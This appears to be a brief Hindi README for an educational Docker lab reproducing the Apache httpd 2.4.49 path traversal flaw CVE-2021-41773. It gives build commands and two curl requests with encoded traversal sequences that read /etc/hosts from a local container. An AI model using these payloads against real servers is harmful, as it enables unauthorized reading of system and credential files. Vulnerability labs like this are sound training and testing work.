
शैक्षिक डॉकर-आधारित प्रयोगशाला जो CVE-2021-41773 पथ ट्रैवर्सल एक्सप्लॉइट को Apache httpd 2.4.49 के विरुद्ध प्रदर्शित करता है, curl-आधारित शोषण कमांड के साथ।
केवल शैक्षिक उद्देश्यों के लिए।
विवरण के लिए संदर्भ देखें।
$ git clone https://github.com/masahiro331/CVE-2021-41773.git
$ cd CVE-2021-41773
$ docker build -t cve-2021-41773 .
$ docker run -d -p 8080:80 cve-2021-41773
# यह कमजोरी Alias के उपयोग को प्रभावित करती है।
$ curl http://localhost:8080/cgi-bin/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts
$ curl http://localhost:8080/webpath/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts